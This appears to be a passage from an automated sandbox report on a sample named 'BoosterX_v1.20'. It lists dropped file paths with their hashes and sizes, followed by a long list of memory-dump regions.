436ba7317a2277d3657ea06f7a07d35cde54f3ef4bd052408e7dbebf718d2ecb

SHA512
7456dc4e9f26fc644b0db1c0b060e3daea59d1fed4e119d9bfe88001324c58b1eb20f6bb8dec447a8125d1e7e2d088b7629a0a1b1b2d6f565413641807658088

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
12476086a6d5d51bd96d85d60db76b95

SHA1
4693874074ae2b9766bfd5b630b3bf298317eeaa

SHA256
a113b211386a336af080bcf051074e26a4523b007caae0cd2187ebe39a4b7c2c

SHA512
2839e4ad7b5f4eb9a09a1d0f0c92c5a26c2a30ddd32f2bd4f68a21b3e72291be9be8c228baad4df535715f10b651f8415de175f8a07fb3b96d7d4740579090de

Download Submit
C:\Users\Admin\AppData\Local\Temp\A35633~1.TMP
Filesize
390KB

MD5
feaf8265bdeab4c3a659e2b872c8160e

SHA1
fc85fd435c79c87623120e7d9c452aeeac497ba6

SHA256
500c88224a7065c5512775ea205f857f494e3dfefd74d182dabaab3df097b5cd

SHA512
027f627e448f40b44465b7dff821fcd1116190f4a3605d1e46f5218a126bd8028df6bc31dcb31f8290f5ebec7f4639d9ac414350fee896fb53382bc36f49cd66

Download Submit
C:\Users\Admin\Downloads\BoosterX_v1.20.zip
Filesize
3.7MB

MD5
a5a2f3d9879ab0bf125e25b859c6c1d1

SHA1
12a5668accda721c3469b9550b2acd6c21f15394

SHA256
6f92d535afeb2444181341ae8eadb08726c3aee0aac49e5a49c0135ff23418c6

SHA512
4ab6ad0595ec9755187948c314f5437aaa73ea0c8c6ace64f01a07d710714b47861f0ada2efcfec26022a6d2fc27f03cf76454aad401afe2e5affc3eb197ce31

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BoosterX_v1.20.exe.log
Filesize
2KB

MD5
f882206e4ff63200dea3af406f2beaca

SHA1
edeb919b408da36418588bb282420d8bfa7c9757

SHA256
e0c7c21dbf3a1f92b4a34ac53cb00ff2d4807fa01b0d8dad2156db50166a17c6

SHA512
8cf2a78339d11a3b16194bdba5f8a319d0b54cc99fefff5f0c632a82ca75fe75774c1964d8efea8ea9135a450a0e5b427a49929a9b952cc611099fb151c518ea

Download Submit
\??\pipe\crashpad_1732_DTFEWSBXKLHAUSNW
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/116-162-0x0000000000000000-mapping.dmp

Download
memory/432-154-0x0000000000000000-mapping.dmp

Download
memory/432-156-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/432-190-0x0000000000000000-mapping.dmp

Download
memory/448-196-0x0000000000000000-mapping.dmp

Download
memory/704-188-0x0000000000000000-mapping.dmp

Download
memory/1056-173-0x0000000000000000-mapping.dmp

Download
memory/1068-203-0x0000000000000000-mapping.dmp

Download
memory/1400-226-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/1472-205-0x0000000000000000-mapping.dmp

Download
memory/1612-200-0x0000000000000000-mapping.dmp

Download
memory/1680-211-0x0000000000000000-mapping.dmp

Download
memory/1820-174-0x0000000000000000-mapping.dmp

Download
memory/1888-157-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/1888-150-0x0000000000000000-mapping.dmp

Download
memory/1944-222-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/2116-145-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/2116-139-0x0000000000000000-mapping.dmp

Download
memory/2148-133-0x00000171F5AB0000-0x00000171F5AB8000-memory.dmp

Filesize
32KB

Download
memory/2148-132-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/2148-134-0x00000171FA9E0000-0x00000171FAA18000-memory.dmp

Filesize
224KB

Download
memory/2148-131-0x00000171DB110000-0x00000171DB518000-memory.dmp

Filesize
4.0MB

Download
memory/2148-135-0x00000171F5AE0000-0x00000171F5AEE000-memory.dmp

Filesize
56KB

Download
memory/2148-136-0x00000171FF900000-0x00000171FF912000-memory.dmp

Filesize
72KB

Download
memory/2168-234-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/2204-170-0x0000000000000000-mapping.dmp

Download
memory/2228-219-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/2228-216-0x00000194CDF70000-0x00000194CDF86000-memory.dmp

Filesize
88KB

Download
memory/2228-218-0x00000194CE030000-0x00000194CE056000-memory.dmp

Filesize
152KB

Download
memory/2228-215-0x00000194CDAB0000-0x00000194CDAD2000-memory.dmp

Filesize
136KB

Download
memory/2228-217-0x00000194CDF60000-0x00000194CDF6A000-memory.dmp

Filesize
40KB

Download
memory/2240-230-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/2260-201-0x0000000000000000-mapping.dmp

Download
memory/2260-152-0x0000000000000000-mapping.dmp

Download
memory/2260-158-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/2356-183-0x0000000000000000-mapping.dmp

Download
memory/2368-163-0x0000000000000000-mapping.dmp

Download
memory/2396-244-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/2428-143-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/2428-138-0x0000000000000000-mapping.dmp

Download
memory/2464-206-0x0000000000000000-mapping.dmp

Download
memory/2720-191-0x0000000000000000-mapping.dmp

Download
memory/2748-159-0x0000000000000000-mapping.dmp

Download
memory/2800-169-0x0000000000000000-mapping.dmp

Download
memory/2804-171-0x0000000000000000-mapping.dmp

Download
memory/3088-168-0x0000000000000000-mapping.dmp

Download
memory/3096-144-0x0000000000000000-mapping.dmp

Download
memory/3104-236-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/3128-175-0x0000000000000000-mapping.dmp

Download
memory/3160-166-0x0000000000000000-mapping.dmp

Download
memory/3180-209-0x0000000000000000-mapping.dmp

Download
memory/3312-192-0x0000000000000000-mapping.dmp

Download
memory/3328-195-0x0000000000000000-mapping.dmp

Download
memory/3404-199-0x0000000000000000-mapping.dmp

Download
memory/3556-180-0x0000000000000000-mapping.dmp

Download
memory/3556-198-0x0000000000000000-mapping.dmp

Download
memory/3616-181-0x0000000000000000-mapping.dmp

Download
memory/3700-197-0x0000000000000000-mapping.dmp

Download
memory/3708-161-0x0000000000000000-mapping.dmp

Download
memory/3708-186-0x0000000000000000-mapping.dmp

Download
memory/3764-142-0x0000000000000000-mapping.dmp

Download
memory/3764-148-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/3788-202-0x0000000000000000-mapping.dmp

Download
memory/3816-184-0x0000000000000000-mapping.dmp

Download
memory/3840-250-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/3876-204-0x0000000000000000-mapping.dmp

Download
memory/3900-167-0x0000000000000000-mapping.dmp

Download
memory/3984-248-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/4048-178-0x0000000000000000-mapping.dmp

Download
memory/4100-187-0x0000000000000000-mapping.dmp

Download
memory/4196-224-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/4248-212-0x0000000000000000-mapping.dmp

Download
memory/4284-179-0x0000000000000000-mapping.dmp

Download
memory/4292-268-0x000001AD0710B000-0x000001AD0710E000-memory.dmp

Filesize
12KB

Download
memory/4292-266-0x000001AD0710B000-0x000001AD0710E000-memory.dmp

Filesize
12KB

Download
memory/4292-272-0x000001AD05180000-0x000001AD051A0000-memory.dmp

Filesize
128KB

Download
memory/4292-267-0x000001AD0710B000-0x000001AD0710E000-memory.dmp

Filesize
12KB

Download
memory/4292-270-0x000001AD05560000-0x000001AD05568000-memory.dmp

Filesize
32KB

Download
memory/4292-271-0x000001AD051A0000-0x000001AD051C0000-memory.dmp

Filesize
128KB

Download
memory/4292-260-0x000001AD05160000-0x000001AD05180000-memory.dmp

Filesize
128KB

Download
memory/4292-265-0x000001AD0710B000-0x000001AD0710E000-memory.dmp

Filesize
12KB

Download
memory/4324-172-0x0000000000000000-mapping.dmp

Download
memory/4324-208-0x0000000000000000-mapping.dmp

Download
memory/4340-185-0x0000000000000000-mapping.dmp

Download
memory/4440-193-0x0000000000000000-mapping.dmp

Download
memory/4468-232-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/4488-242-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/4512-194-0x0000000000000000-mapping.dmp

Download
memory/4580-238-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/4580-165-0x0000000000000000-mapping.dmp

Download
memory/4588-164-0x0000000000000000-mapping.dmp

Download
memory/4648-141-0x0000000000000000-mapping.dmp

Download
memory/4648-147-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/4684-176-0x0000000000000000-mapping.dmp

Download
memory/4736-228-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/4768-146-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/4768-140-0x0000000000000000-mapping.dmp

Download
memory/4800-246-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/4824-240-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/4848-182-0x0000000000000000-mapping.dmp

Download
memory/5008-210-0x0000000000000000-mapping.dmp

Download
memory/5012-177-0x0000000000000000-mapping.dmp

Download
memory/5024-149-0x0000000000000000-mapping.dmp

Download
memory/5024-155-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download
memory/5108-207-0x0000000000000000-mapping.dmp

Download
memory/5112-153-0x0000000000000000-mapping.dmp

Download
memory/5112-189-0x0000000000000000-mapping.dmp

Download
memory/5112-160-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmp

Filesize
10.8MB

Download